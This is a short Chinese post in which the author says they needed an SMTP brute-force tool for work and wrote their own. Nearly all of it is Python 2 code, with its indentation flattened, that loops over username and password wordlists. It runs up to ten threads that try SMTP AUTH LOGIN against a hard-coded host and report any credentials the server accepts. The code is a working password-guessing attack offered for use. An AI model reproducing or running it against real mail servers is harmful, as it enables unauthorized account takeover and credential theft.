工作中要用到smtp暴力猜测工具,找了很多资源都不支持smtp协议,好不容易找到一个也是python写的,但是因为太强大了不会用。
所以只好自己写了一个。平时不怎么写代码,很多地方处理的都不是很好,就作为一个参考吧。
import socket
import base64
import threading
import time
def login(user,passwd,host):
user = user[0:-1]
passwd = passwd[0:-1]
print "begin guessing using username %s and password %s"%(user,passwd)
new_soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
user64 = base64.encodestring(user)[0:-1]+'\r\n'
passwd64 = base64.encodestring(passwd)[0:-1]+'\r\n'
try:
new_soc.connect((host,25))
new_soc.recv(1024)
new_soc.sendall("EHLO computer\r\n")
new_soc.recv(1024)
new_soc.sendall('AUTH LOGIN\r\n')
new_soc.recv(1024)
new_soc.sendall(user64)
new_soc.recv(1024)
new_soc.sendall(passwd64)
result = new_soc.recv(1024)
except:
print "socket error"
return 0
if result.find(" successful") == -1:
return 0
else:
print "congratulation! usr %s password %s"%(user,passwd)
return 1
def start_guess((user_name_file,user_pass_file,host)):
count = 0
try:
user_file = open(user_name_file,'r')
except:
print "unable to open "+user_name_file
try:
pass_file = open(user_pass_file)
except:
print "unable to open "+user_pass_file
for usr in user_file.readlines():
pass_file.seek(0)
for passwd in pass_file.readlines():
while True:
if threading.activeCount()<10:
threading.Thread(target=login,args=(usr,passwd,host)).start()
break;
else:
time.sleep(1)
if __name__ == "__main__":
start_guess(('name','pass','10.14.69.203'))